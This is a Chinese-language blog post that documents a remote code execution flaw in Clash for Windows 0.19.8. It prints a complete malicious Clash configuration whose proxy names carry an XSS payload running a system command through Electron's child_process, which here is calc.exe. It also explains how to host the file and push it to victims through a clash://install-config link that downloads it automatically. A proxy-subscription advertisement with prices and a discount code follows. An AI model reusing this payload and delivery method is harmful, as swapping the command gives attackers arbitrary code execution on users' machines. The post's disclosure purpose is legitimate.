crash_for_windows_pkg 由 Electron 提供支持。 如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。
version: 0.19.8 (0.19.9版本还有其他漏洞触发,正好是0.19.9)
系统: Windows
系统版本: Windows 10
导入以下Clash配置文件:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
注意:
您需要确保有效负载显示在代理列中。
漏洞利用在理论上是稳定的,但有时可能需要重新启动 crash_for_windows_pkg 并重现漏洞
将恶意配置文件放到互联网上并使用clash://安装它,clash_for_windows_pkg 将自动下载并切换到它。
例如:clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
CFW最新版本:https://github.com/Fndroid/clash_for_windows_pkg/releases
CFW漏洞issues:https://github.com/Fndroid/clash_for_windows_pkg/issues/2710#issue-1148197704
多达20国家原生ip节点、全节点解锁奈飞(无限制地区片源)、让你畅通无阻如德芙纵享丝滑般刷剧、畅快使用Twitter、Tik Tok、facbook、netflix、油管、谷歌
| 套餐 | 每月流量(GB) | 月付(元) | 季付(元) | 半年(元) | 年付(元) | 备注 |
|---|---|---|---|---|---|---|
| 火星1号 | 100 | 15 | 45 | 90 | 90 | 无IPLC专线 |
| 火星2号 | 300 | 35 | 105 | 210 | 252 | 有IPLC专线 |
| 精简年费 | 40 | × | × | × | 66 | 每年限量100份 |
| TikTok流量包 | 666 | × | × | 88 | × | 半年限量100份 |
| 最强王者流量包 | 2048 | × | × | × | 299 |
[scode type="green"]本站专属优惠码:AUOKHXRTNT (8折)
[/scode]
